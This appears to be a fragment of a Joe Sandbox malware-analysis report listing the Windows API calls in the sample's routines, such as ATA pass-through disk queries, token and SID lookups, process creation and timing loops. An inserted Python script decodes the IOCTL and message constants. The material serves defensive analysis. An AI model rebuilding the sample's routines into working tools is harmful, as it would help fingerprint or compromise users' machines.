                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap_free
                                                                        • String ID:
                                                                        • API String ID: 614378929-0
                                                                        • Opcode ID: 0b3129238624da17bcb6c68a38a3ba977fc606c41e5a78a82b12babcd070476b
                                                                        • Instruction ID: 3518fe1057f707aaf4f89c4b341d30f52ad626e0729b941015158db28f6a8c1c
                                                                        • Opcode Fuzzy Hash: 0b3129238624da17bcb6c68a38a3ba977fc606c41e5a78a82b12babcd070476b
                                                                        • Instruction Fuzzy Hash: 9A11C132649236BBDB313B70BD057D97B78AF94360F208915F5499A155DB38C9C096D0
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 009305AC
                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009305C7
                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009305DD
                                                                        • FreeLibrary.KERNEL32(?), ref: 00930632
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                        • String ID:
                                                                        • API String ID: 3137044355-0
                                                                        • Opcode ID: c55adb5e52b36189da3c48e870b732574a22803044373e9508823b0bb963c319
                                                                        • Instruction ID: adb8dbd5e2ccc203f3d23d7143e30fe32f415f3327f24cba11ebfbc087cff564
                                                                        • Opcode Fuzzy Hash: c55adb5e52b36189da3c48e870b732574a22803044373e9508823b0bb963c319
                                                                        • Instruction Fuzzy Hash: 64218172901209EFDB208F91DCAAADBBBBCEFC0708F008969E51A92150D774EA55DF50
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00936733
                                                                        • _memset.LIBCMT ref: 00936754
                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 009367A6
                                                                        • CloseHandle.KERNEL32(00000000), ref: 009367AF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                        • String ID:
                                                                        • API String ID: 1157408455-0
                                                                        • Opcode ID: e7b17da4bf164b4f5af6823f4cd5b5f8bb849f8e8e83ebf50e9b4ed0d02385a2
                                                                        • Instruction ID: a0e6049630eed60b0fb290f9df4a567fdbe4d7568b51f0ea754c02c79d654d17
                                                                        • Opcode Fuzzy Hash: e7b17da4bf164b4f5af6823f4cd5b5f8bb849f8e8e83ebf50e9b4ed0d02385a2
                                                                        • Instruction Fuzzy Hash: 7711CA769013287AE72057A5AC4DFEFBABCEF44764F10419AF509E71D0D2744E808BA4
                                                                        APIs
                                                                          • Part of subcall function 0092AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0092AA79
                                                                          • Part of subcall function 0092AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0092AA83
                                                                          • Part of subcall function 0092AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0092AA92
                                                                          • Part of subcall function 0092AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0092AA99
                                                                          • Part of subcall function 0092AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0092AAAF
                                                                        • GetLengthSid.ADVAPI32(?,00000000,0092ADE4,?,?), ref: 0092B21B
                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0092B227
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0092B22E
                                                                        • CopySid.ADVAPI32(?,00000000,?), ref: 0092B247
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                        • String ID:
                                                                        • API String ID: 4217664535-0
                                                                        • Opcode ID: 13faf348c890ed1daff7c17226fb59419cf0c8aa77419b87a7d7fe02b0f822d3
                                                                        • Instruction ID: d753ffc97a5bbd3f5ee9049e9c47fa9c01371f25c2d22ffcbe430e753d28cf67
                                                                        • Opcode Fuzzy Hash: 13faf348c890ed1daff7c17226fb59419cf0c8aa77419b87a7d7fe02b0f822d3
                                                                        • Instruction Fuzzy Hash: BC11CE72A01215EFCB089F98ED84AAEB7FDEF94304F14802DE95697214D731AE84DB10
                                                                        APIs
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0092B498
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0092B4AA
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0092B4C0
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0092B4DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: e4d39f4a4db15416c8f0259f0d666ddc319ad7762c91009c3afaa14244d6cd48
                                                                        • Instruction ID: 16454acc70069531387b1f4c565e8d33011ad33c7ac0313fbd3e5b0d5fee27aa
                                                                        • Opcode Fuzzy Hash: e4d39f4a4db15416c8f0259f0d666ddc319ad7762c91009c3afaa14244d6cd48
                                                                        • Instruction Fuzzy Hash: 2311487A900228FFDB11EFA8D881E9DBBB8FB48710F204091E604B7294D771AE10DB94
                                                                        APIs
                                                                          • Part of subcall function 0090B34E: GetWindowLongW.USER32(?,000000EB), ref: 0090B35F
                                                                        • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0090B5A5
                                                                        • GetClientRect.USER32(?,?), ref: 0096E69A
                                                                        • GetCursorPos.USER32(?), ref: 0096E6A4
                                                                        • ScreenToClient.USER32(?,?), ref: 0096E6AF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 4127811313-0
                                                                        • Opcode ID: 66bcb22a2036041d79ce1aaa759c154d0de9dd63afedf6114895cd53821e815f
                                                                        • Instruction ID: 94af0fb709ddd174976a5a7bd0cdea309a9b72a42ce369023d0fa947b1a9a346
                                                                        • Opcode Fuzzy Hash: 66bcb22a2036041d79ce1aaa759c154d0de9dd63afedf6114895cd53821e815f
                                                                        • Instruction Fuzzy Hash: 4A11453690102AFFDB10DF98CD869EE7BB8EF49305F100491F906E7180D334AA81DBA1
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00937352
                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00937385
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0093739B
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009373A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                        • String ID:
                                                                        • API String ID: 2880819207-0
                                                                        • Opcode ID: 8b7ebe4719b796860cee2bc8cd276eb8959727842200040214afddce271ee2ef
                                                                        • Instruction ID: 518ef3cec383503fcb832f3874a9c186a854bf361515e05b78987c0bebb8caab
                                                                        • Opcode Fuzzy Hash: 8b7ebe4719b796860cee2bc8cd276eb8959727842200040214afddce271ee2ef
                                                                        • Instruction Fuzzy Hash: 8011C4B2A1C204BFD711DBA8EC05A9EBBADAF45324F144355F935E32A1D6708D00ABA1
                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0090D1BA
                                                                        • GetStockObject.GDI32(00000011), ref: 0090D1CE
                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0090D1D8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                        • String ID:
                                                                        • API String ID: 3970641297-0
                                                                        • Opcode ID: 051a8cb4a6cb11729a58d1777e570b92e457271c22784aba132f24a694ff2f1d
                                                                        • Instruction ID: 99e0ffe4afb958eaed1c85cb3101078650a1ddd0b691bac91dcd2bf1e9fca7e8
                                                                        • Opcode Fuzzy Hash: 051a8cb4a6cb11729a58d1777e570b92e457271c22784aba132f24a694ff2f1d
                                                                        • Instruction Fuzzy Hash: 5D11ADB210A509BFEF0A4F909C50EEABB6DFF08364F040102FA1452090CB319CA0EBA0
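                                                                        The numeric arguments in the listings above (the 0004D02C control code passed to DeviceIoControl and the C0000000/00000003/00000080 flags of the CreateFileW before it, the 000000B0 and 000000C9 messages in the SendMessageW routine, and the 00000011 stock object and 00000030 message in the CreateWindowExW routine) have to be decoded by hand before the routine's purpose is clear. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that splits a Windows CTL_CODE into device type, access, function and method, names the storage pass-through IOCTLs and window messages that appear in this section, and annotates listing lines in the report's own format. The sample lines are copied from the listings above; the IOCTL table is limited to codes whose definitions in ntddscsi.h and winioctl.h are certain, and anything not in it is reported as "unknown" together with its decoded fields. Under this decoding, 0004D02C is IOCTL_ATA_PASS_THROUGH; the 0x200 buffers on both sides are the size of an ATA IDENTIFY DEVICE block, which is an inference from the sizes, not something the report states.

```python
import re

# Added example, not part of the Joe Sandbox report or of the analysed sample.
# CTL_CODE layout from winioctl.h: DeviceType<<16 | Access<<14 | Function<<2 | Method
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS",
          3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
DEVICE_TYPES = {0x04: "FILE_DEVICE_CONTROLLER", 0x07: "FILE_DEVICE_DISK", 0x2D: "FILE_DEVICE_MASS_STORAGE"}


def ctl_code(device_type, function, method, access):
    """Same arithmetic as the CTL_CODE macro."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


# Storage pass-through codes from ntddscsi.h / ntdddisk.h / winioctl.h (IOCTL_SCSI_BASE == 0x04).
KNOWN_IOCTLS = {
    ctl_code(0x04, 0x0401, 0, 3): "IOCTL_SCSI_PASS_THROUGH",
    ctl_code(0x04, 0x0402, 0, 3): "IOCTL_SCSI_MINIPORT",
    ctl_code(0x04, 0x0405, 0, 3): "IOCTL_SCSI_PASS_THROUGH_DIRECT",
    ctl_code(0x04, 0x040A, 0, 3): "IOCTL_IDE_PASS_THROUGH",
    ctl_code(0x04, 0x040B, 0, 3): "IOCTL_ATA_PASS_THROUGH",
    ctl_code(0x04, 0x040C, 0, 3): "IOCTL_ATA_PASS_THROUGH_DIRECT",
    ctl_code(0x07, 0x0022, 0, 3): "SMART_RCV_DRIVE_DATA",
    ctl_code(0x2D, 0x0500, 0, 0): "IOCTL_STORAGE_QUERY_PROPERTY",
}

# Window messages and other constants seen in this section of the report.
WINDOW_MESSAGES = {0x0020: "WM_SETCURSOR", 0x0030: "WM_SETFONT", 0x00B0: "EM_GETSEL", 0x00C9: "EM_LINEFROMCHAR"}
STOCK_OBJECTS = {0x11: "DEFAULT_GUI_FONT"}
ACCESS_MASK = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
               0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def decode_ioctl(code):
    """Return (name or 'unknown', decoded fields) for a control code."""
    fields = {
        "device_type": DEVICE_TYPES.get(code >> 16, hex(code >> 16)),
        "access": ACCESS[(code >> 14) & 0x3],
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
    }
    return KNOWN_IOCTLS.get(code, "unknown"), fields


def flag_names(value, table):
    """Render a bit mask as 'A|B'; unknown argument values ('?') come through as None."""
    if not isinstance(value, int):
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else "0"


def name_or_hex(value, table):
    if not isinstance(value, int):
        return "?"
    return table.get(value, hex(value))


# One listing line, e.g. "DeviceIoControl.KERNEL32(00000000,0004D02C,?,...), ref: 009367A6"
CALL_RE = re.compile(r"(\w+)\.(\w+)\(([^)]*)\)")


def _arg(token):
    token = token.strip()
    if token == "?":
        return None          # the report could not recover this argument
    try:
        return int(token, 16)
    except ValueError:
        return token         # string arguments such as "cdecl" are shown verbatim


def parse_call(line):
    """Return (api, module, args) or None for lines without a call, e.g. '_free.LIBCMT ref: ...'."""
    m = CALL_RE.search(line)
    if not m:
        return None
    api, module, raw = m.groups()
    return api, module, [_arg(t) for t in raw.split(",")] if raw else []


def annotate(line):
    """Decode the constants of the calls this section is concerned with."""
    parsed = parse_call(line)
    if parsed is None:
        return {}
    api, _module, args = parsed
    notes = {}
    if api == "DeviceIoControl" and len(args) > 1 and isinstance(args[1], int):
        name, fields = decode_ioctl(args[1])
        notes["ioctl"] = name
        notes.update(fields)
    elif api == "SendMessageW" and len(args) > 1:
        notes["msg"] = name_or_hex(args[1], WINDOW_MESSAGES)
    elif api == "GetStockObject" and args:
        notes["object"] = name_or_hex(args[0], STOCK_OBJECTS)
    elif api == "CreateFileW" and len(args) >= 6:
        notes = {"access": flag_names(args[1], ACCESS_MASK), "share": flag_names(args[2], SHARE_MODE),
                 "disposition": name_or_hex(args[4], DISPOSITION),
                 "attributes": "FILE_ATTRIBUTE_NORMAL" if args[5] == 0x80 else name_or_hex(args[5], {})}
    return notes


# Sample input: lines copied from the API listings in this section of the report.
SAMPLE_LINES = [
    "CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00936733",
    "DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 009367A6",
    "SendMessageW.USER32(?,000000B0,?,?), ref: 0092B498",
    "SendMessageW.USER32(?,000000C9,?,00000000), ref: 0092B4AA",
    "GetStockObject.GDI32(00000011), ref: 0090D1CE",
    "SendMessageW.USER32(00000000,00000030,00000000), ref: 0090D1D8",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(parse_call(line)[0], annotate(line))
```

                                                                        Running the script on the six copied lines names the CreateFileW open as GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING on a normal-attribute handle, the control code as IOCTL_ATA_PASS_THROUGH (device type FILE_DEVICE_CONTROLLER, function 0x40B, METHOD_BUFFERED, read and write access), the two edit-control messages as EM_GETSEL and EM_LINEFROMCHAR, and the font setup as WM_SETFONT with DEFAULT_GUI_FONT. Any code outside the table decodes to "unknown" but still shows its device type and function number, which is usually enough to look it up in the SDK headers.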
                                                                        APIs
                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00932B1B,?,00933B9F,?,00008000), ref: 00933FB8
                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00932B1B,?,00933B9F,?,00008000), ref: 00933FDD
                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00932B1B,?,00933B9F,?,00008000), ref: 00933FE7
                                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,00932B1B,?,00933B9F,?,00008000), ref: 0093401A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CounterPerformanceQuerySleep
                                                                        • String ID:
                                                                        • API String ID: 2875609808-0
                                                                        • Opcode ID: 36ee716112e732f10b4d5acbef9314e9e1bf822834df7b2b85ff145ea3780ae6
                                                                        • Instruction ID: ec656ffd3e9dc9483db0c6447617c4d015869976cefaa58270fd20602c470714
                                                                        • Opcode Fuzzy Hash: 36ee716112e732f10b4d5acbef9314e9e1bf822834df7b2b85ff145ea3780ae6
                                                                        • Instruction Fuzzy Hash: BF118E31E0561DDBDF049FA4D949BEEBB38FF49711F414045EA41B2280CB30A6A0DF91
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                        • String ID:
                                                                        • API String ID: 3016257755-0
                                                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                        • Instruction ID: a5a6fbf4b9adcb6d2abf294b06c9e5a5b61ae005f197894f098a088d1f335760
                                                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                        • Instruction Fuzzy Hash: A101493204015EBBDF125F84EC05CEE3F27BB58350B5A8455FE2859039D336CAB2AB81
                                                                        APIs
                                                                          • Part of subcall function 00917A0D: __getptd_noexit.LIBCMT ref: 00917A0E
                                                                        • __lock.LIBCMT ref: 0091748F
                                                                        • InterlockedDecrement.KERNEL32(?), ref: 009174AC
                                                                        • _free.LIBCMT ref: 009174BF
                                                                        • InterlockedIncrement.KERNEL32(01021660), ref: 009174D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                        • String ID:
                                                                        • API String ID: 2704283638-0
                                                                        • Opcode ID: a02e7b97f406233256e859f23b218e93b9bd3e5282b9949094d3c82f506d8982
                                                                        • Instruction ID: eaecd5b95644fd1fc99fb91445e78add167318dc326b9e3ee87a46c3c7297f0b
                                                                        • Opcode Fuzzy Hash: a02e7b97f406233256e859f23b218e93b9bd3e5282b9949094d3c82f506d8982
                                                                        • Instruction Fuzzy Hash: F801A132B0A61AA7DB22AFE598057DDFB75BF45710F144005F464676E0CB2459C0DFC2
                                                                        APIs
                                                                        • __lock.LIBCMT ref: 00917AD8
                                                                          • Part of subcall function 00917CF4: __mtinitlocknum.LIBCMT ref: 00917D06
                                                                          • Part of subcall function 00917CF4: EnterCriticalSection.KERNEL32(00000000,?,00917ADD,0000000D), ref: 00917D1F
                                                                        • InterlockedIncrement.KERNEL32(?), ref: 00917AE5
                                                                        • __lock.LIBCMT ref: 00917AF9
                                                                        • ___addlocaleref.LIBCMT ref: 00917B17
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                        • String ID:
                                                                        • API String ID: 1687444384-0
                                                                        • Opcode ID: e4abafc784883c662376b51423a053d77e61f9dbe30ae8d17aed837627c93414
                                                                        • Instruction ID: 22fa37a95f007b276039479b2feb5c500481b93b42fa1ced17051528f92ede54
                                                                        • Opcode Fuzzy Hash: e4abafc784883c662376b51423a053d77e61f9dbe30ae8d17aed837627c93414
                                                                        • Instruction Fuzzy Hash: C1016D72648B05DFE731DFB5D90578AF7F0AF84325F20890EA49A972A0CB70A680CB51
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0095E33D
                                                                        • _memset.LIBCMT ref: 0095E34C
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009B3D00,009B3D44), ref: 0095E37B
                                                                        • CloseHandle.KERNEL32 ref: 0095E38D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                        • String ID:
                                                                        • API String ID: 3277943733-0
                                                                        • Opcode ID: 888a3e4c565d366fffdbd2c19536c92faa91cafb7032469c57802627b414a7c5
                                                                        • Instruction ID: e691776ee5efddcaff3538b9a3e6a8acd03ddd27f32e0e959a940b68fe73dbce
                                                                        • Opcode Fuzzy Hash: 888a3e4c565d366fffdbd2c19536c92faa91cafb7032469c57802627b414a7c5
                                                                        • Instruction Fuzzy Hash: 45F089F16543047EE3109B61AD55FB77EACDB44B64F008521FE08D61E2D3765E4097A4
                                                                        APIs
                                                                          • Part of subcall function 0090AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0090AFE3
                                                                          • Part of subcall function 0090AF83: SelectObject.GDI32(?,00000000), ref: 0090AFF2
                                                                          • Part of subcall function 0090AF83: BeginPath.GDI32(?), ref: 0090B009
                                                                          • Part of subcall function 0090AF83: SelectObject.GDI32(?,00000000), ref: 0090B033
